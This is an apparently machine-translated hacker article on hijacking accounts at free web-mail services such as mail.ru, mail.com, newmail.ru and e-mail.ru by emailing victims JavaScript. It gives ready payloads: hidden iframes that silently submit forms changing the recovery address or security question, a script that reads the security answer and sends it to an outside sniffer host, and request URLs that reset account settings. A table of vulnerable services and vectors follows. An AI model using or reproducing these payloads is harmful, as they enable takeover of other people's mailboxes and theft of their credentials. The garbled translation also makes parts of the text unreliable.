OVERVIEW OF VULNERABILITY OF FREE POSTAL SERVICES
We continue to deal with web-mail. I conducted a small study of various services for hacking and present to your attention the results. The technology of attack remains the same: a letter with a JavaScript-code sent to someone else's address is sent, which works when the message is opened, and changes any information in the user box settings. There is no point in describing each server in detail, since the approach is the same everywhere, so I will give some examples, and at the end - a table. In most cases, hacking can be considered 100%, with some assumptions: the user must necessarily use the web interface to read letters, when writing exploits I was guided by a standard platform, that is, I initially assume that the user does not have any exotic OS or Browser with JS execution disabled.WWW.MAIL.RU
I'll start with mail number 1 in Russia. At the moment, through the skipping of JavaScript and one developer error, breaking this box can be done. I believe that the basic principles are well known. How to get a password? 1 - to change it unauthorized. Do not pass, you need to know the previously established. 2 - to change the secret question and use the service to combat amnesia. Also will not work. 3 - set up your alternate Email to get a new password generated by the system. It does not work out, the last two options listed above are in the same form and are also password protected. Even the rest, representing for us less interest settings (Name, Surname, etc.) now without entering the current password will not be able to change. It would seem that there are no options. However, there is such a secondary, inconspicuous section of settings "Contact information" (ICQ, website, phone, work place, time zone, etc.). In this section, you can also specify a contact email. The trick is that while in the registration information the alternative address changes but that which is registered in the questionnaire, and now you can get a password for the soap, using the reminder service. It's simple. URL: http://win.mail.ru/cgi-bin/anketa?page=2&[email protected]
I. We send a letter to the desired box with a code that will generate a frame directly in the body of the message with a link to our site. If possible, the script should work without any user input (clicking, clicking, mouseover, uploading images, etc.):
<Embed src = "javascript: document.getElementById ('xxx'). InnerHTML = '<iframe src = http: //yoursite.yourdomain.com/yourscript.html> </ iframe>'; this.wav">
<P id = 'xxx'>
In order to fully ensure the functionality of the script, as well as disguise, we convert:
<Embed src = "javascript: status = location; document.getElementById ('xxx'). InnerHTML = '<iframe src = http: //yoursite.com/yourscript.html width = 0 height = 0> </ iframe>' ; This.wav "width = 0 height = 0>
<P id = 'xxx'>
In this form, the character codes replace the letters in the name of the javascript and iframe elements, and the mail script does not filter them. The status = location line; Creates a visibility of the local URL in the status bar so that no outside flicker arouses suspicion. The width and height attributes of both the frame and embed are set to zero, and make them invisible. II. On the resource http://yoursite.ru we have an HTML document with a form for sending the changed data to the mail.ru server.
The contents of yourscript.html:
<Form method = "post" action = "http://win.mail.ru/cgi-bin/anketa" name = "anketa"> <br> <Input type = "hidden" name = "page" value = "2"> <br> <Input type = "hidden" name = "Email" value = "[email protected]"> <br> <Input type = "hidden" value = "Save" name = "Save"> <br> </ Form> <br> <Script> <br> Document.anketa.submit () <br> </ Script>Notes: the work of the client part of the script in an unmodified way is guaranteed only for IE; The form of sending is posted on a separate site specifically to "unload" the letter.
WWW.MAIL.COM
Now a slightly different security error, for example http://mail.com. If you use the password reminder service, then to get it you just need to enter the correct answer to the secret question (one of the options). Hence we set ourselves the task of obtaining this answer. This is done easily. When I went into the properties of the mailbox and looked through the registration information, I saw that the answer to the secret question is not hidden, which allows us to use JavaScript to calculate its value.We implement the script through the style tag.
Address of the page with the settings: http://mail01.mail.com/scripts/common/genprofile.cgi
Form name: profileform
The name of the text field with a secret response: hint_a
In the end, to steal a secret question, you need to call up the settings page, run JavaScript, get the value of document.profileform.hint_a.value, and pass it to the sniffer along with the environment variable REQUEST_UR I.
Ready-made version:
<Style> @import url (javascript: document.getElementById ('out'). InnerHTML = "<iframe src = http: //mail01.mail.com/scripts/common/genprofile.cgi name = 'zero'% 6FnLoad = `Str = document.zero.profileform.hint_a.value; path = 'http: //zero.h12.ru/stat/capt.php?'; Document.zero.location = path + str`> </ iframe>" ); </ Style>
<Span id = 'out'> </ span>
In the generated frame with the name zero, the settings page is loaded. At the end of the load, the OnLoad handler starts the script for reading the secret question, and then, through the same frame, sends a response to the sniffer. Now it is enough to go to the address http://zero.h12.ru/stat/log.php, and find the necessary information in the line "Host" . WWW.NEWMAIL.RU
In my opinion, a fairly popular postman, so I'll tell you about it in detail. Especially since it is much easier to take possession of another's account than it seems at first sight. You can do this: send a letter with a script that will receive the session id at startup, generate the required queries, and change the settings of the altrenrative email (to which the password is subsequently sent) and a secret question and answer. However, if you specify any other address with a reminder, the password will be sent to it, if only the secret answer was correct. And the following observation: session id to change the settings can not be used at all. Plus, all tags are allowed. All of the above reduces the amount of code to a couple of lines:<Iframe src = http: //newmail.ru/users/chpass.dhtml? Cp_msg = 1 & cp_quest = QUESTION & cp_answ = ANSWER width = 0 height = 0> </ iframe>
WWW.E-MAIL.RU
The method of hacking e-mail.ru somewhat does not fit into the general theme of the article, but still - mail 
. When I needed to get a password from one box, I registered my account as usual and began to investigate the system. The first thing that caught my eye was the ability to set a new password and a secret question with an answer, without entering the old password. The action plan is normal: check the filtering of tags, get the ID and execute the query. However, to change the settings used a special variable utoken, which is contained in the body of the document. After experimenting with the change of the question and the answer with the previously known utoken:
http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&[email protected]&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ
Notes: there have been some changes at the moment. Password recovery service does not work, so it is advisable to change it immediately. The address of the configuration change has also changed:
http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&[email protected]&[email protected]&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ
Table with characteristics of free WWW-servers
| SERVER | Javascript | VULNERABILITY |
| Www.km.ru
Km.ru |
Img src = javascript: | Allows you to read the password from the settings page from the password field |
| Www.mail.ru
Inbox.ru , bk.ru , list.ru , |
Embed src = javascript: | You can change an alternate email |
| Www.mail.com
Email.com , post.com , myself.com , consultant.com and others. |
@ Import url (javascript:); | The settings show the answer to the security question |
| Www.newmail.ru
Nm.ru , hotmail.ru , orc.ru , nightmail.ru |
In any way | Read / change the question and answer. The password is valid |
| Www.netman.ru and www.mailgate.ru
The same mailer. About 80 domains |
Img src = javascript:, style = background: url (javascript:) | You can steal an answer to a security question, if it is installed. It is also possible to set the address for forwarding (copies are not saved) |
| Www.yandex.ru | OnError, OnLoad | Removing the site * .narod.ru (JS is not required) |
| Www.ukr.net | Embed src = javasc Ript: this .wav> |
Read the answer to your security question |
| Www.nextmail.ru
Xaker.ru , email.su , russian.ru , students.ru , programist.ru , designer.ru , mail2k.ru , |
Embed src = "javascript: | Change / steal the answer to your security question |
| Www.hotbox.ru
Pochta.ru , pisem.net , fromru.com , land.ru , and others. |
In many ways | Account deleting |
| Www.rin.ru | Embed src = javascript: | Read secret answer |
Comments
Commenting on, remember that the content and tone of your message can hurt the feelings of real people, show respect and tolerance to your interlocutors even if you do not share their opinion, your behavior in the conditions of freedom of expression and anonymity provided by the Internet, changes Not only virtual, but also the real world. All comments are hidden from the index, spam is controlled.